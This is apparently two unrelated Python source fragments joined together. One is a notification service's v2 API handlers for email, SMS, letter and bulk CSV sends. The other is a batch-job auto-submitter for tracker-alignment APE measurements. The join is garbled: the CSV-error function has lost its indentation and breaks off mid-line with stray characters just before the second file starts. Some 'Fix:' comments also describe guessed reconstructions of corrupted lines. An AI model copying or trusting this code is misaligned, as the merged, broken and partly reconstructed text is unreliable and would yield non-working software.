    check_rate_limiting(authenticated_service, api_user)

    template = get_precompiled_letter_template(authenticated_service.id)
    # The client reference doubles as the first address line.
    form["personalisation"] = {"address_line_1": form["reference"]}

    notification = process_letter_notification(
        letter_data=form,
        api_key=api_user,
        template=template,
        reply_to_text=get_reply_to_text(LETTER_TYPE, form, template),
        precompiled=True,
    )
    response_body = {
        "id": notification.id,
        "reference": notification.client_reference,
        "postage": notification.postage,
    }
    return jsonify(response_body), 201
@v2_notification_blueprint.route("/bulk", methods=["POST"])
def post_bulk():
    """Create a bulk-send job from either inline rows or a CSV payload."""
    try:
        request_json = request.get_json()
    except werkzeug.exceptions.BadRequest as e:
        raise BadRequestError(message=f"Error decoding arguments: {e.description}", status_code=400)

    max_rows = current_app.config["CSV_MAX_ROWS"]
    form = validate(request_json, post_bulk_request(max_rows))

    # Exactly one of "rows" (inline) or "csv" (raw file data) must be given.
    provided_sources = [source for source in [form.get("rows"), form.get("csv")] if source]
    if len(provided_sources) != 1:
        raise BadRequestError(message="You should specify either rows or csv", status_code=400)

    template = validate_template_exists(form["template_id"], authenticated_service)
    check_service_has_permission(template.template_type, authenticated_service.permissions)
    remaining_messages = authenticated_service.message_limit - fetch_todays_total_message_count(authenticated_service.id)
    form["validated_sender_id"] = validate_sender_id(template, form.get("reply_to_id"))

    try:
        if form.get("rows"):
            # Serialize the inline rows to CSV so both inputs share one path.
            buffer = StringIO()
            csv.writer(buffer).writerows(form["rows"])
            file_data = buffer.getvalue()
        else:
            file_data = form["csv"]
        recipient_csv = RecipientCSV(
            file_data,
            template_type=template.template_type,
            placeholders=template._as_utils_template().placeholders,
            max_rows=max_rows,
            safelist=safelisted_members(authenticated_service, api_user.key_type),
            remaining_messages=remaining_messages,
        )
    except csv.Error as e:
        raise BadRequestError(message=f"Error converting to CSV: {str(e)}", status_code=400)

    check_for_csv_errors(recipient_csv, max_rows, remaining_messages)
    job = create_bulk_job(authenticated_service, api_user, template, form, recipient_csv)
    return jsonify(data=job_schema.dump(job).data), 201
@v2_notification_blueprint.route("/<notification_type>", methods=["POST"])
def post_notification(notification_type):
    """Create and dispatch a single email/SMS/letter notification.

    Validates the JSON body against the type-specific schema, checks
    permissions/rate limits, persists (or schedules) the notification, and
    returns the v2 response payload with HTTP 201.
    """
    try:
        request_json = request.get_json()
    except werkzeug.exceptions.BadRequest as e:
        raise BadRequestError(
            message="Error decoding arguments: {}".format(e.description),
            status_code=400,
        )

    if notification_type == EMAIL_TYPE:
        form = validate(request_json, post_email_request)
    elif notification_type == SMS_TYPE:
        form = validate(request_json, post_sms_request)
    elif notification_type == LETTER_TYPE:
        form = validate(request_json, post_letter_request)
    else:
        abort(404)

    check_service_has_permission(notification_type, authenticated_service.permissions)

    scheduled_for = form.get("scheduled_for", None)
    check_service_can_schedule_notification(authenticated_service.permissions, scheduled_for)

    check_rate_limiting(authenticated_service, api_user)

    template, template_with_content = validate_template(
        form["template_id"],
        strip_keys_from_personalisation_if_send_attach(form.get("personalisation", {})),
        authenticated_service,
        notification_type,
    )

    reply_to = get_reply_to_text(notification_type, form, template)

    if notification_type == LETTER_TYPE:
        notification = process_letter_notification(
            letter_data=form,
            api_key=api_user,
            template=template,
            reply_to_text=reply_to,
        )
    else:
        notification = process_sms_or_email_notification(
            form=form,
            notification_type=notification_type,
            api_key=api_user,
            template=template,
            service=authenticated_service,
            reply_to_text=reply_to,
        )
        template_with_content.values = notification.personalisation

    if notification_type == SMS_TYPE:
        create_resp_partial = functools.partial(create_post_sms_response_from_notification, from_number=reply_to)
    elif notification_type == EMAIL_TYPE:
        # Fall back to the platform email domain when the service has no
        # sending domain of its own.
        if authenticated_service.sending_domain is None or authenticated_service.sending_domain.strip() == "":
            sending_domain = current_app.config["NOTIFY_EMAIL_DOMAIN"]
        else:
            sending_domain = authenticated_service.sending_domain
        create_resp_partial = functools.partial(
            create_post_email_response_from_notification,
            subject=template_with_content.subject,
            # Fix: the original line here was corrupted (unterminated string).
            # Reconstructed sender address as <service email_from>@<domain>.
            email_from="{}@{}".format(authenticated_service.email_from, sending_domain),
        )
    elif notification_type == LETTER_TYPE:
        create_resp_partial = functools.partial(
            create_post_letter_response_from_notification,
            subject=template_with_content.subject,
        )

    resp = create_resp_partial(
        notification=notification,
        content=str(template_with_content),
        url_root=request.url_root,
        scheduled_for=scheduled_for,
    )
    return jsonify(resp), 201
def process_sms_or_email_notification(*, form, notification_type, api_key, template, service, reply_to_text=None):
    """Persist an SMS/email notification (directly, via Celery, or scheduled).

    Returns a ``Notification`` instance. Simulated recipients are persisted
    but never queued for delivery.
    """
    form_send_to = form["email_address"] if notification_type == EMAIL_TYPE else form["phone_number"]
    send_to = validate_and_format_recipient(
        send_to=form_send_to,
        key_type=api_key.key_type,
        service=service,
        notification_type=notification_type,
    )
    # Do not persist or send notification to the queue if it is a simulated recipient
    simulated = simulated_recipient(send_to, notification_type)
    # May rewrite file-attachment entries into download URLs.
    personalisation = process_document_uploads(form.get("personalisation"), service, simulated, template.id)
    # Payload used by the Celery persistence path; encrypted before queueing.
    notification = {
        "id": create_uuid(),
        "template": str(template.id),
        "template_version": str(template.version),
        "to": form_send_to,
        "personalisation": personalisation,
        "simulated": simulated,
        "api_key": str(api_key.id),
        "key_type": str(api_key.key_type),
        "client_reference": form.get("reference", None),
    }
    encrypted_notification_data = encryption.encrypt(notification)
    scheduled_for = form.get("scheduled_for", None)
    if scheduled_for:
        # Scheduled sends are always persisted synchronously.
        notification = persist_notification(
            template_id=template.id,
            template_version=template.version,
            recipient=form_send_to,
            service=service,
            personalisation=personalisation,
            notification_type=notification_type,
            api_key_id=api_key.id,
            key_type=api_key.key_type,
            client_reference=form.get("reference", None),
            simulated=simulated,
            reply_to_text=reply_to_text,
        )
        persist_scheduled_notification(notification.id, form["scheduled_for"])
    elif current_app.config["FF_NOTIFICATION_CELERY_PERSISTENCE"] and not simulated:
        # depending on the type route to the appropriate save task
        # NOTE(review): this branch uses the module-level `authenticated_service`
        # rather than the `service` argument -- presumably they are always the
        # same object for this endpoint; confirm before refactoring.
        if notification_type == EMAIL_TYPE:
            current_app.logger.info("calling save email task")
            save_email.apply_async(
                (authenticated_service.id, create_uuid(), encrypted_notification_data, None),
                queue=QueueNames.DATABASE if not authenticated_service.research_mode else QueueNames.RESEARCH_MODE,
            )
        elif notification_type == SMS_TYPE:
            save_sms.apply_async(
                (authenticated_service.id, create_uuid(), encrypted_notification_data, None),
                queue=QueueNames.DATABASE if not authenticated_service.research_mode else QueueNames.RESEARCH_MODE,
            )
    else:
        # Synchronous persistence path (also used for simulated recipients).
        notification = persist_notification(
            template_id=template.id,
            template_version=template.version,
            recipient=form_send_to,
            service=service,
            personalisation=personalisation,
            notification_type=notification_type,
            api_key_id=api_key.id,
            key_type=api_key.key_type,
            client_reference=form.get("reference", None),
            simulated=simulated,
            reply_to_text=reply_to_text,
        )
        if not simulated:
            send_notification_to_queue(
                notification=notification,
                research_mode=service.research_mode,
                queue=template.queue_to_use(),
            )
        else:
            current_app.logger.debug("POST simulated notification for id: {}".format(notification.id))
    if not isinstance(notification, Notification):
        # Celery path: the dict was queued, not saved; build an unsaved
        # Notification object for the HTTP response, renaming the dict keys
        # to the model's field names.
        notification["template_id"] = notification["template"]
        notification["api_key_id"] = notification["api_key"]
        notification["template_version"] = template.version
        notification["service"] = service
        notification["service_id"] = service.id
        notification["reply_to_text"] = reply_to_text
        del notification["template"]
        del notification["api_key"]
        del notification["simulated"]
        notification = Notification(**notification)
    return notification
def process_document_uploads(personalisation_data, service, simulated, template_id):
    """Replace file-attachment personalisation entries with download URLs.

    Entries whose value is a dict containing a "file" key are uploaded via
    the document-download client (or stubbed for simulated recipients).
    Returns the (possibly copied and modified) personalisation data.
    """
    attachment_keys = [
        k for k, v in (personalisation_data or {}).items()
        if isinstance(v, dict) and "file" in v
    ]
    if not attachment_keys:
        return personalisation_data

    personalisation_data = personalisation_data.copy()

    # NOTE(review): checks the globally authenticated service's permissions,
    # not the `service` argument -- presumably identical; confirm with callers.
    check_service_has_permission(UPLOAD_DOCUMENT, authenticated_service.permissions)

    for key in attachment_keys:
        if simulated:
            personalisation_data[key] = document_download_client.get_upload_url(service.id) + "/test-document"
        else:
            try:
                personalisation_data[key] = document_download_client.upload_document(
                    service.id, personalisation_data[key]
                )
            except DocumentDownloadError as e:
                raise BadRequestError(message=e.message, status_code=e.status_code)

    if not simulated:
        save_stats_for_attachments(
            [v for k, v in personalisation_data.items() if k in attachment_keys],
            service.id,
            template_id,
        )
    return personalisation_data
def save_stats_for_attachments(files_data, service_id, template_id):
    """Record statsd metrics for a batch of uploaded attachments."""
    nb_files = len(files_data)
    statsd_client.incr(f"attachments.nb-attachments.count-{nb_files}")
    statsd_client.incr("attachments.nb-attachments", count=nb_files)
    statsd_client.incr(f"attachments.services.{service_id}", count=nb_files)
    statsd_client.incr(f"attachments.templates.{template_id}", count=nb_files)
    for document in (f["document"] for f in files_data):
        statsd_client.incr(f"attachments.sending-method.{document['sending_method']}")
        statsd_client.incr(f"attachments.file-type.{document['mime_type']}")
        # File size is in bytes; bucket into whole-megabyte ranges, e.g. "0-1mb".
        nb_mb = document["file_size"] // (1_024 * 1_024)
        file_size_bucket = f"{nb_mb}-{nb_mb + 1}mb"
        statsd_client.incr(f"attachments.file-size.{file_size_bucket}")
def process_letter_notification(*, letter_data, api_key, template, reply_to_text, precompiled=False):
    """Create a letter notification and kick off PDF generation.

    Team keys may not send letters, and trial-mode services may only send
    with a test key. Precompiled letters are delegated to
    ``process_precompiled_letter_notifications``.
    """
    if api_key.key_type == KEY_TYPE_TEAM:
        raise BadRequestError(message="Cannot send letters with a team api key", status_code=403)
    if not api_key.service.research_mode and api_key.service.restricted and api_key.key_type != KEY_TYPE_TEST:
        raise BadRequestError(message="Cannot send letters when service is in trial mode", status_code=403)
    if precompiled:
        return process_precompiled_letter_notifications(
            letter_data=letter_data,
            api_key=api_key,
            template=template,
            reply_to_text=reply_to_text,
        )
    test_key = api_key.key_type == KEY_TYPE_TEST
    # if we don't want to actually send the letter, then start it off in SENDING so we don't pick it up
    status = NOTIFICATION_CREATED if not test_key else NOTIFICATION_SENDING
    queue = QueueNames.CREATE_LETTERS_PDF if not test_key else QueueNames.RESEARCH_MODE
    notification = create_letter_notification(
        letter_data=letter_data,
        template=template,
        api_key=api_key,
        status=status,
        reply_to_text=reply_to_text,
    )
    create_letters_pdf.apply_async([str(notification.id)], queue=queue)
    if test_key:
        if current_app.config["NOTIFY_ENVIRONMENT"] in ["preview", "development"]:
            # Non-production test sends get a fake provider response file.
            create_fake_letter_response_file.apply_async((notification.reference,), queue=queue)
        else:
            # Elsewhere, test-key letters are marked delivered immediately.
            update_notification_status_by_reference(notification.reference, NOTIFICATION_DELIVERED)
    return notification
def process_precompiled_letter_notifications(*, letter_data, api_key, template, reply_to_text):
    """Create a notification for a precompiled (ready-made PDF) letter.

    Decodes the base64 letter content, creates the notification in
    PENDING_VIRUS_CHECK, uploads the PDF and queues it for virus scanning
    (or stubs the scan out when antivirus is disabled).

    Raises:
        BadRequestError: 400 when the letter content is not valid base64.
    """
    status = NOTIFICATION_PENDING_VIRUS_CHECK
    # Keep the try block minimal: only the decode can raise ValueError
    # (binascii.Error is a ValueError subclass).
    try:
        letter_content = base64.b64decode(letter_data["content"])
    except ValueError:
        raise BadRequestError(
            message="Cannot decode letter content (invalid base64 encoding)",
            status_code=400,
        )

    notification = create_letter_notification(
        letter_data=letter_data,
        template=template,
        api_key=api_key,
        status=status,
        reply_to_text=reply_to_text,
    )
    filename = upload_letter_pdf(notification, letter_content, precompiled=True)

    current_app.logger.info("Calling task scan-file for {}".format(filename))

    # call task to add the filename to anti virus queue
    if current_app.config["ANTIVIRUS_ENABLED"]:
        notify_celery.send_task(
            name=TaskNames.SCAN_FILE,
            kwargs={"filename": filename},
            queue=QueueNames.ANTIVIRUS,
        )
    else:
        # stub out antivirus in dev
        process_virus_scan_passed.apply_async(
            kwargs={"filename": filename},
            queue=QueueNames.LETTERS,
        )

    return notification
def validate_sender_id(template, reply_to_id):
    """Validate *reply_to_id* against the authenticated service and return it.

    Dispatches on the template's notification type; only email and SMS are
    supported, any other type raises NotImplementedError.
    """
    notification_type = template.template_type
    service_id = str(authenticated_service.id)

    if notification_type == EMAIL_TYPE:
        check_service_email_reply_to_id(service_id, reply_to_id, notification_type)
        return reply_to_id

    if notification_type == SMS_TYPE:
        check_service_sms_sender_id(service_id, reply_to_id, notification_type)
        return reply_to_id

    raise NotImplementedError("validate_sender_id only handles emails and text messages")
def get_reply_to_text(notification_type, form, template, form_field=None):
    """Resolve the reply-to text for a notification.

    Emails: the validated service reply-to address, falling back to the
    template's own reply-to. SMS: the validated sender id formatted as a
    phone number, falling back to the template's reply-to. Letters: the
    template's reply-to. Any other type yields None.
    """
    if notification_type == EMAIL_TYPE:
        requested_id = form.get(form_field or "email_reply_to_id")
        validated = check_service_email_reply_to_id(
            str(authenticated_service.id),
            requested_id,
            notification_type,
        )
        return validated or template.get_reply_to_text()

    if notification_type == SMS_TYPE:
        requested_id = form.get(form_field or "sms_sender_id")
        sms_sender_id = check_service_sms_sender_id(str(authenticated_service.id), requested_id, notification_type)
        if sms_sender_id:
            return try_validate_and_format_phone_number(sms_sender_id)
        return template.get_reply_to_text()

    if notification_type == LETTER_TYPE:
        return template.get_reply_to_text()

    return None
def strip_keys_from_personalisation_if_send_attach(personalisation):
    """Return *personalisation* without direct-attach file attachment entries.

    An entry is stripped when its value is a plain dict whose
    "sending_method" is "attach"; everything else is kept unchanged.
    """
    def _is_direct_attachment(value):
        # type() (not isinstance) mirrors the original strictness:
        # only plain dicts count, not dict subclasses.
        return type(value) is dict and value.get("sending_method") == "attach"

    stripped = {}
    for key, value in personalisation.items():
        if not _is_direct_attachment(value):
            stripped[key] = value
    return stripped
def check_for_csv_errors(recipient_csv, max_rows, remaining_messages):
nb_rows = len(recipient_csv)
if recipient_csv.has_errors:
if recipient_csv.missing_column_headers:
raise BadRequestError(
message=f"Missing column headers: {', '.join(sorted(recipient_csv.missing_column_headers))}",
status_code=400,
)
if recipient_csv.duplicate_recipient_column_headers:
raise BadRequestError(
message=f"Duplicate column headers: {', '.join(sorted(recipient_csv.duplicate_recipient_column_headers))}",
status_code=400,
)
if recipient_csv.more_rows_than_can_send:
raise BadRequestError(
message=f"You only have {remaining_messages} remaining messages before you reach your daily limit. You've tried to send {nb_rows} messages.",
status_code=400,
)
if recipient_csv.too_many_rows:
raise BadRequestError(
message=f"Too many rows. Maximum number of rows allowed is {max_rows}",
status_code=400,
)
if not recipient_csv.allowed_to_send_to:
if api_user.key_type == KEY_TYPE_TEAM:
explanation = "because you used a team and safelist API key."
if authenticated_service.restricted:
explanation = (
"because your service is in trial mode. You can only send to members of your team and your safelist."
)
raise BadRequestError(
message=f"You cannot send to these recipients {explanation}",
status_code=400,
)
if recipient_csv.rows_with_errors:
def row_error(row):
content = []
for header in [header for header in recipient_csv.column_headers if row[header].error]:
if row[header].recipient_error:
content.append(f"`{header}`: invalid recipient")
else:
content.append(f"`{header}`: {row[header].error}")
return f"Row {row.index} - {','.join(content)}"
errors = ". ".join([row_error(row) for row in recipient_csv.initial_rows_with_errors])
raise BadRequestError(
message=f"Some rows have errors. {errors}.",
status_code=400,
)
else:
raise NotImplementedError("Got errors but code | |
from __future__ import print_function
import ConfigParser
import argparse
import pickle
import sys
import os
import subprocess
import shutil
import time
pickle_name = "dump.pkl"  # contains all the measurement objects in a list
history_file = "history.log"
clock_interval = 20  # in seconds

# State machine constants for an APE measurement. Failed states are the
# corresponding "done" state + 10.
STATE_NONE = -1
STATE_ITERATION_START = 0
STATE_BJOBS_WAITING = 1
STATE_BJOBS_DONE = 2
STATE_BJOBS_FAILED = 12
STATE_MERGE_WAITING = 3
STATE_MERGE_DONE = 4
STATE_MERGE_FAILED = 14
STATE_SUMMARY_WAITING = 5
STATE_SUMMARY_DONE = 6
STATE_SUMMARY_FAILED = 16
STATE_LOCAL_WAITING = 7
STATE_LOCAL_DONE = 8
STATE_LOCAL_FAILED = 18
STATE_FINISHED = 9

# Human-readable names for every state code, used for status reporting.
status_map = {
    STATE_NONE: "STATE_NONE",
    STATE_ITERATION_START: "STATE_ITERATION_START",
    STATE_BJOBS_WAITING: "STATE_BJOBS_WAITING",
    STATE_BJOBS_DONE: "STATE_BJOBS_DONE",
    STATE_BJOBS_FAILED: "STATE_BJOBS_FAILED",
    STATE_MERGE_WAITING: "STATE_MERGE_WAITING",
    STATE_MERGE_DONE: "STATE_MERGE_DONE",
    STATE_MERGE_FAILED: "STATE_MERGE_FAILED",
    STATE_SUMMARY_WAITING: "STATE_SUMMARY_WAITING",
    STATE_SUMMARY_DONE: "STATE_SUMMARY_DONE",
    STATE_SUMMARY_FAILED: "STATE_SUMMARY_FAILED",
    STATE_LOCAL_WAITING: "STATE_LOCAL_WAITING",
    STATE_LOCAL_DONE: "STATE_LOCAL_DONE",
    STATE_LOCAL_FAILED: "STATE_LOCAL_FAILED",
    STATE_FINISHED: "STATE_FINISHED",
}

base = ""
def ensurePathExists(path):
    """Create directory *path* (including parents) if it does not exist.

    Safe to call when the directory is already there; any other OSError
    (permissions, bad path, ...) is re-raised. `os` is already imported at
    module level, so only `errno` is imported locally.
    """
    import errno
    try:
        os.makedirs(path)
    except OSError as exception:
        # EEXIST just means the directory already exists, which is fine.
        if exception.errno != errno.EEXIST:
            raise
def replaceAllRanges(string):
    """Expand the first "[...]" range expression in *string* into a list.

    Supported syntax inside the brackets: comma-separated items, where an
    item is either a literal token or a "low-high" integer range, e.g.
    "file[1-3,7].root" -> ["file1.root", "file2.root", "file3.root",
    "file7.root"]. Recurses so several bracket groups expand
    combinatorially. A string without brackets is returned as a
    single-element list.

    Fix: the original computed the bracket contents twice and built an
    unused `expression` variable; the dead code is removed.
    """
    if "[" in string and "]" in string:
        strings = []
        posS = string.find("[")
        posE = string.find("]")
        nums = string[posS + 1:posE]
        for interval in nums.split(","):
            interval = interval.strip()
            if "-" in interval:
                lowNum = int(interval.split("-")[0])
                upNum = int(interval.split("-")[1])
                for i in range(lowNum, upNum + 1):
                    # substitute one value, then expand any remaining groups
                    strings += replaceAllRanges(string[0:posS] + str(i) + string[posE + 1:])
            else:
                strings += replaceAllRanges(string[0:posS] + interval + string[posE + 1:])
        return strings
    else:
        return [string, ]
def save(measurements):
    """Serialise the list of measurement objects to the pickle dump file.

    Fix: the file is opened in binary mode ("wb"), which pickle requires on
    Python 3 and which also avoids newline corruption on Windows under
    Python 2; text mode ("w") was a latent bug.
    """
    with open(pickle_name, "wb") as saveFile:
        pickle.dump(measurements, saveFile)
class Dataset:
    # Class-level defaults; every instance overwrites these in __init__.
    name = ""
    nFiles = 0
    maxEvents = -1
    baseDirectory = ""
    sampleType = "data1"
    fileList = []
    conditions = []

    def __init__(self, config, name):
        """Build a dataset description from the [dataset:<name>] config section.

        Expands [a-b,c] range expressions in fileNames, records the sample
        type (MC vs data) and collects any "condition <Record>" entries as
        {"record", "connect", "tag"} dicts.

        Fix: dict.has_key() is Python-2-only; use the `in` operator, which
        behaves identically and also works on Python 3. Also renamed the
        loop variable so it no longer shadows the `name` parameter.
        """
        dsDict = dict(config.items("dataset:{}".format(name)))
        self.name = name
        self.baseDirectory = dsDict["baseDirectory"]
        self.fileList = []
        names = dsDict["fileNames"].split(" ")
        for fileNameExpr in names:
            # file names may contain [a-b,c] range expressions
            parsedNames = replaceAllRanges(fileNameExpr)
            for fileName in parsedNames:
                self.fileList.append(self.baseDirectory + "/" + fileName)
        self.nFiles = len(self.fileList)

        if "maxEvents" in dsDict:
            self.maxEvents = dsDict["maxEvents"]
        if "isMC" in dsDict:
            if dsDict["isMC"] == "True":
                self.sampleType = "MC"
            else:
                self.sampleType = "data1"

        self.conditions = []
        for key, value in dsDict.items():
            if key.startswith("condition"):
                record = key.split(" ")[1]
                connect, tag = value.split(" ")
                self.conditions.append({"record": record, "connect": connect, "tag": tag})
class Alignment:
    # Class-level defaults; every instance overwrites these in __init__.
    name = ""
    alignmentName = None
    baselineDir = "Design"
    globalTag = "None"
    isDesign = False
    hasAlignmentCondition = False
    conditions = []

    def __init__(self, config, name):
        """Parse the [alignment:<name>] section of *config*.

        Collects the optional alignmentName / globalTag / baselineDir /
        isDesign settings plus any "condition <Record>" entries. A
        TrackerAlignmentRcd condition sets hasAlignmentCondition, in which
        case no other Alignment object is loaded in apeEstimator_cfg.py via
        the alignmentName. Exits if neither an alignmentName nor an
        alignment condition is defined.

        Fix: dict.has_key() is Python-2-only (replaced with `in`), and the
        identity comparison `== None` is replaced with `is None`.
        """
        alDict = dict(config.items("alignment:{}".format(name)))
        self.name = name
        if "alignmentName" in alDict:
            self.alignmentName = alDict["alignmentName"]
        if "globalTag" in alDict:
            self.globalTag = alDict["globalTag"]
        if "baselineDir" in alDict:
            self.baselineDir = alDict["baselineDir"]
        if "isDesign" in alDict:
            self.isDesign = (alDict["isDesign"] == "True")

        self.hasAlignmentCondition = False
        self.conditions = []
        for key, value in alDict.items():
            if key.startswith("condition"):
                record = key.split(" ")[1]
                connect, tag = value.split(" ")
                if record == "TrackerAlignmentRcd":
                    self.hasAlignmentCondition = True
                self.conditions.append({"record": record, "connect": connect, "tag": tag})

        # check if at least one of the two ways to define the alignment was used
        if self.alignmentName is None and not self.hasAlignmentCondition:
            print("Error: No alignment object name or record was defined for alignment {}".format(self.name))
            sys.exit()
class ApeMeasurement:
    """One APE measurement campaign, driven as a state machine.

    Instances submit batch jobs per dataset file, poll them, merge their
    ROOT outputs and produce a summary, iterating up to maxIterations
    times. The `status` field holds one of the STATE_* codes defined at
    module level.
    """
    # Class-level defaults; __init__ overwrites all of these per instance.
    name = "workingArea"
    curIteration = 0
    firstIteration = 0
    maxIterations = 15
    status = STATE_NONE
    dataset = None
    alignment = None
    runningJobs = None
    failedJobs = None
    startTime = ""
    finishTime = ""
def __init__(self, name, dataset, alignment, additionalOptions=None):
    """Set up a measurement over *dataset* with *alignment*.

    additionalOptions is a dict of attribute overrides applied verbatim
    via setattr (e.g. firstIteration, maxIterations).

    Fix: the mutable default argument `{}` would be shared between all
    calls that omit it; use None and substitute a fresh empty dict.
    """
    self.name = name
    self.alignment = alignment
    self.dataset = dataset
    self.curIteration = 0
    self.status = STATE_ITERATION_START
    self.runningJobs = []
    self.failedJobs = []
    self.startTime = subprocess.check_output(["date"]).strip()
    if additionalOptions is None:
        additionalOptions = {}
    for key, value in additionalOptions.items():
        setattr(self, key, value)
        print(key, value)
    # options arrive as strings from the config; normalise to int
    self.firstIteration = int(self.firstIteration)
    self.maxIterations = int(self.maxIterations)
    self.curIteration = self.firstIteration
    if self.alignment.isDesign:
        self.maxIterations = 0

    if self.alignment.isDesign and self.dataset.sampleType != "MC":
        # For now, this won't immediately shut down the program
        print("APE Measurement {} is scheduled to to an APE baseline measurement with a dataset that is not marked as isMC=True. Is this intended?".format(self.name))
    ensurePathExists('{}/hists/{}'.format(base, self.name))
    if not self.alignment.isDesign:
        ensurePathExists('{}/hists/{}/apeObjects'.format(base, self.name))
def get_status(self):
    """Return the human-readable name of the current state code."""
    current_state = self.status
    return status_map[current_state]
def print_status(self):
    """Print a one-line progress report for this measurement."""
    message = "APE Measurement {} in iteration {} is now in status {}".format(
        self.name, self.curIteration, self.get_status()
    )
    print(message)
def submit_jobs(self):
    """Write one batch script per dataset file plus a submit script, run it,
    and move the measurement into STATE_BJOBS_WAITING.

    Side effects: optionally writes a conditions _cff.py, writes one .tcsh
    job script per input file and a self-deleting submit_*.sh, and appends
    (jobName, fileNumber) pairs to self.runningJobs. Exits the program when
    the submission command produces no output (no bsub available / dead
    ssh session).
    """
    toSubmit = []

    allConditions = self.alignment.conditions + self.dataset.conditions
    allConditions = list({v['record']: v for v in allConditions}.values())  # should we clean for duplicate records? the overlap record last defined (from dataset)
    # will be kept in case of overlap, which is the same as if there was no overlap removal

    # If conditions are made, create file to load them from
    conditionsFileName = "None"
    # Fix: rawFileName was previously assigned only inside the branch below,
    # causing a NameError when formatting inputCommands for measurements
    # without any conditions. Default it to "None" like conditionsFileName.
    rawFileName = "None"
    if len(allConditions) > 0:
        conditionsFileName = "{base}/python/conditions/conditions_{name}_iter{iterNo}_cff.py".format(base=base, name=self.name, iterNo=self.curIteration)
        rawFileName = "conditions_{name}_iter{iterNo}_cff".format(name=self.name, iterNo=self.curIteration)
        with open(conditionsFileName, "w") as fi:
            from autoSubmitterTemplates import conditionsFileHeader
            fi.write(conditionsFileHeader)
            from autoSubmitterTemplates import conditionsTemplate
            for condition in allConditions:
                fi.write(conditionsTemplate.format(record=condition["record"], connect=condition["connect"], tag=condition["tag"]))

    alignmentNameToUse = self.alignment.alignmentName
    if self.alignment.hasAlignmentCondition:
        alignmentNameToUse = "fromConditions"

    lastIter = (self.curIteration == self.maxIterations) and not self.alignment.isDesign

    # create a batch job file for each input file
    for i in range(self.dataset.nFiles):
        inputFile = self.dataset.fileList[i]
        inputCommands = "sample={sample} fileNumber={fileNo} iterNumber={iterNo} lastIter={lastIter} alignRcd={alignRcd} maxEvents={maxEvents} globalTag={globalTag} measurementName={name} conditions={conditions}".format(sample=self.dataset.sampleType, fileNo=i+1, iterNo=self.curIteration, lastIter=lastIter, alignRcd=alignmentNameToUse, maxEvents=self.dataset.maxEvents, globalTag=self.alignment.globalTag, name=self.name, conditions=rawFileName)
        fiName = "{}/test/autoSubmitter/workingArea/batchscript_{}_iter{}_{}".format(base, self.name, self.curIteration, i+1)
        with open(fiName + ".tcsh", "w") as jobFile:
            from autoSubmitterTemplates import bjobTemplate
            jobFile.write(bjobTemplate.format(inputFile=inputFile, inputCommands=inputCommands))
        toSubmit.append((fiName, i+1))

    # submit all batch jobs
    submitName = "{}/test/autoSubmitter/workingArea/submit_{}_jobs_iter{}.sh".format(base, self.name, self.curIteration)
    with open(submitName, "w") as submitFile:
        for sub, number in toSubmit:
            from autoSubmitterTemplates import submitJobTemplate
            errorFile = sub + "_error.txt"
            outputFile = sub + "_output.txt"
            jobFile = sub + ".tcsh"
            date = subprocess.check_output(["date", "+%m_%d_%H_%M_%S"]).strip()
            jobName = sub.split("/")[-1] + "_" + date
            self.runningJobs.append((jobName, number))
            submitFile.write(submitJobTemplate.format(errorFile=errorFile, outputFile=outputFile, jobFile=jobFile, jobName=jobName))
        submitFile.write("rm -- $0")  # the submit script deletes itself

    subOut = subprocess.check_output("bash {}".format(submitName), shell=True).strip()
    if len(subOut) == 0:
        print("Running on environment that does not know bsub command or ssh session is timed out (ongoing for longer than 24h?), exiting")
        sys.exit()
    self.status = STATE_BJOBS_WAITING
    self.print_status()
def check_jobs(self):
    """Poll the batch system for every running job and update the state.

    Jobs reported DONE are additionally checked for "Fatal Exception" in
    their error file; EXIT or unknown states mark the job as failed; a job
    missing from the queue is assumed to have finished long ago. When all
    jobs are accounted for, transitions to STATE_BJOBS_DONE or
    STATE_BJOBS_FAILED.
    """
    lastStatus = self.status
    stillRunningJobs = []
    # check all still running jobs
    for job, number in self.runningJobs:
        from autoSubmitterTemplates import checkJobTemplate
        checkString = checkJobTemplate.format(jobName=job)
        jobState = subprocess.check_output(checkString, shell=True).rstrip()
        if "DONE" in jobState:
            # Catch Exceptions that do not influence the job state but make the measurement fail anyway
            errFile = "{}/test/autoSubmitter/workingArea/batchscript_{}_iter{}_{}_error.txt".format(base, self.name, self.curIteration, number)
            foundErr = False
            with open(errFile, "r") as err:
                for line in err:
                    if "Fatal Exception" in line.strip():
                        foundErr = True
                        break
            if foundErr:
                print("Job {} in iteration {} of APE measurement {} has failed".format(job, self.curIteration, self.name))
                self.failedJobs.append(job)
            else:
                print("Job {} in iteration {} of APE measurement {} has just finished".format(job, self.curIteration, self.name))
        elif "EXIT" in jobState:
            print("Job {} in iteration {} of APE measurement {} has failed".format(job, self.curIteration, self.name))
            self.failedJobs.append(job)
        elif "RUN" in jobState or "PEND" in jobState:
            stillRunningJobs.append((job, number))
        elif "Job <{}> is not found".format(job) in jobState:
            # Fix: the message previously had one placeholder but two format
            # arguments, silently dropping the measurement name.
            print("Job {} of APE measurement {} was not found in queue, so it is assumed that it successfully finished long ago.".format(job, self.name))
        elif len(jobState) == 0:
            print("Running on environment that does not know bjobs command or ssh session is timed out (ongoing for longer than 24h?), exiting")
            sys.exit()
        else:
            print("Unknown state {}, marking job {} of APE measurement {} as failed".format(jobState, job, self.name))
            self.failedJobs.append(job)
    self.runningJobs = stillRunningJobs

    # at least one job failed
    if len(self.failedJobs) > 0:
        self.status = STATE_BJOBS_FAILED
        self.finishTime = subprocess.check_output(["date"]).strip()
    elif len(self.runningJobs) == 0:
        self.status = STATE_BJOBS_DONE
        print("All batch jobs of APE measurement {} in iteration {} are done".format(self.name, self.curIteration))
    if lastStatus != self.status:
        self.print_status()
def do_merge(self):
    """Merge the per-file ROOT outputs of the current iteration into one file.

    Rotates any existing result folder to "<folder>_old", carries the
    previous iteration's allData_iterationApe.root forward, merges all
    <sampleType><n>.root files into <folder>/allData.root via
    mergeTemplate, deletes the inputs and sets the state to
    STATE_MERGE_DONE or STATE_MERGE_FAILED.
    """
    self.status = STATE_MERGE_WAITING
    if self.alignment.isDesign:
        folderName = '{}/hists/{}/baseline'.format(base, self.name)
    else:
        folderName = '{}/hists/{}/iter{}'.format(base, self.name, self.curIteration)

    # (re)move results from previous measurements before creating folder
    if os.path.isdir(folderName):
        if os.path.isdir(folderName + "_old"):
            shutil.rmtree("{}_old".format(folderName))
        os.rename(folderName, folderName + "_old")
    os.makedirs(folderName)

    # This is so that the structure of the tree can be retrieved by ApeEstimatorSummary.cc and the tree does not have to be rebuilt
